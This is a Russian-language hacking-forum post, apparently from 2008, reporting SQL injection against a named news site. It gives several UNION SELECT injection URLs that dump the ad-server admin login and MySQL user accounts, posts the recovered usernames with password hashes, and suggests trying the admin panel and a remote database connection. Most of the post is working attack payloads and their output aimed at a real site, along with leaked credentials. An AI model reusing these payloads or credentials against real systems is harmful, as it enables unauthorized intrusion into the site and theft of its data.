|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,5,concat(admin,0x3a,adm in_pw)+from+phpads_config/*
admin:dee9eb25bb8bf64bb3097fd26c13911c - обычный md5
.зы попробовать к админке оч даже можно ..
===============================
http://www.dengi-info.com/forum//docs/CHANGELOG.html
3 пхпбб // возможно колонки по дефолту - не помню какие в 3ем ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,password+from+mysq l.user+limit+1,1
юзер pma_kIkP50QYhmSS наводит мысль о скрытом, а точнее переименованном phpmyadmin .. тк кк дефолтные имена не нашёл ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,concat_ws(0x3a,use r,password,host)+from+mysql.user+where+host=0x25+l imit+0,1/*
kpblca:28b270316169288e:% - возможно получится подконектится удалённо к базе ..
Последний раз редактировалось 159932; 11.07.2008 в 03:04..
|